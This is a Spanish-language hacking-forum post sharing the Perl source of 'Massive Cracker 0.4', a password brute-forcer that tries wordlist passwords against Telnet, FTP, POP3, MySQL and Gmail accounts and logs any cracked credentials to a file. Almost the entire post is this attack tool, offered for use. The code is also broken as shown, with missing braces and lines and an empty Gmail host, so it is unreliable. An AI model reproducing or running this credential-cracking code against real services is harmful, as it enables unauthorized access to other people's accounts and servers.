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[Perl] Massive Cracker 0.4

Autor Tema: [Perl] Massive Cracker 0.4  (Leído 1080 veces)

Desconectado Doddy

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[Perl] Massive Cracker 0.4
« en: Junio 02, 2012, 09:14:28 pm »
Nueva version de este programa para crackear el siguiente tipo de cuentas

  • Telnet
  • FTP
  • POP3
  • Mysql
  • Gmail

Tambien le quite la opcion de Hotmail la cual era obsoleta.

El codigo

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#Massive Cracker 0.4
#Coded By Doddy H
#ppm install
#ppm install
#ppm install

use Net::FTP;
use Net::POP3;
use Net::Telnet;
use DBI;

use Mail::POP3Client;
use IO::Socket::SSL;


print "[+] Option :  ";
chomp( my $op = <stdin> );

if ( $op eq "1" ) {

    my ( $host, $user, $word, $time ) = form1();
    my @words = openwordlist( $word, "Telnet" );

    for my $pass (@words) {
        chomp $pass;
        $telnet = new Net::Telnet( Errmode => "return" );
        if ( $telnet->login( $user, $pass ) ) {
            yeah( $host, $user, $pass, "Telnet" );

    print "\n[-] Password Not Found\n";


elsif ( $op eq "2" ) {

    my ( $host, $user, $word, $time ) = form1();
    my @words = openwordlist( $word, "FTP" );

    for my $pass (@words) {
        chomp $pass;
        $ftp = Net::FTP->new($host);
        if ( $ftp->login( $user, $pass ) ) {
            yeah( $host, $user, $pass, "FTP" );

    print "\n[-] Password Not Found\n";

elsif ( $op eq "3" ) {

    my ( $host, $user, $word, $time ) = form1();
    my @words = openwordlist( $word, "POP3" );

    for my $pass (@words) {
        chomp $pass;
        $pop = Net::POP3->new($host);
        if ( $pop->login( $user, $pass ) ) {
            yeah( $host, $user, $pass, "POP3" );

    print "\n[-] Password Not Found\n";


elsif ( $op eq "4" ) {

    my ( $host, $user, $word, $time ) = form1();
    my @words = openwordlist( $word, "Mysql" );

    $target = "dbi:mysql::" . $host . ":3306";

    for my $pass (@words) {
        chomp $pass;
        if ( my $now =
            DBI->connect( $target, $user, $pass, { PrintError => 0 } ) )
            yeah( $host, $user, $pass, "Mysql" );

    print "\n[-] Password Not Found\n";


elsif ( $op eq "5" ) {

    my ( $user, $word, $time ) = form2();
    my @words = openwordlist( $word, "Gmail" );

    for my $pass (@words) {
        chomp $pass;
        my $so = IO::Socket::SSL->new(
            PeerAddr => "",
            PeerPort => 995,
            Proto    => "tcp"

        my $nave = Mail::POP3Client->new();


        if ( $nave->Connect() ) {
            yeahmail( "Gmail", $user, $pass );

    print "\n[-] Password Not Found\n";

else {
    print "\n\n[+] Bad Option\n";


sub yeah {

    print "\a\a\n[+] Cracked\n\n";
    print "[+] Host : $_[0]\n";
    print "[+] Username: $_[1]\n";
    print "[+] Password : $_[2]\n";

    savefile( "cracked-logs.txt",
        $_[3] . ":" . $_[0] . ":" . $_[1] . ":" . $_[2] );



sub yeahmail {

    print "\a\a\n[+] Cracked\n\n";
    print "[+] Account Type : $_[0]\n";
    print "[+] Username : $_[1]\n";
    print "[+] Password : $_[2]\n";

    savefile( "cracked-logs.txt", $_[0] . ":" . $_[1] . ":" . $_[2] );



sub openwordlist {

    my ( $file, $tipo ) = @_;

    print "\n[+] Opening file\n\n";

    unless ( -f $file ) {
        print "\n[-] File not found\n";

    open( FILE, $file );
    my @words = <FILE>;
    close FILE;

    print "[+] Words Found : " . int(@words) . "\n\n";
    print "[+] Cracking service $tipo\n\n";

    return @words;


sub savefile {
    open( SAVE, ">>" . $_[0] );
    print SAVE $_[1] . "\n";
    close SAVE;

sub form1 {

    print "\n[+] Host : ";
    chomp( my $host = <stdin> );
    print "\n[+] User : ";
    chomp( my $user = <stdin> );
    print "\n[+] Wordlist : ";
    chomp( my $word = <stdin> );
    print "\n[+] Timeout : ";
    chomp( my $time = <stdin> );

    return ( $host, $user, $word, $time );


sub form2 {
    print "\n[+] Email : ";
    chomp( my $email = <stdin> );
    print "\n[+] Wordlist : ";
    chomp( my $word = <stdin> );
    print "\n[+] Timeout : ";
    chomp( my $time = <stdin> );
    return ( $email, $word, $time );


sub head {
    print qq(

 @     @                                    @@@@                 @             
 @     @                                   @    @                @             
 @@   @@                                   @                     @             
 @@   @@   @@@   @@   @@  @ @   @  @@@     @      @@  @@@   @@@  @  @   @@@  @@
 @ @ @ @      @ @  @ @  @ @ @   @ @   @    @      @      @ @   @ @ @   @   @ @
 @ @ @ @   @@@@  @    @   @  @ @  @@@@@    @      @   @@@@ @     @@    @@@@@ @
 @  @  @  @   @   @    @  @  @ @  @        @      @  @   @ @     @ @   @     @
 @  @  @  @   @ @  @ @  @ @   @   @   @    @    @ @  @   @ @   @ @  @  @   @ @
 @     @   @@@@  @@   @@  @   @    @@@      @@@@  @   @@@@  @@@  @   @  @@@  @

                                              Coded By Doddy H

[++] Services

 [1] : Telnet
 [2] : FTP
 [3] : POP3
 [4] : Mysql
 [5] : Gmail


sub copyright {
    print "\n\n(C) Doddy Hackman 2012\n\n";

#The End ?
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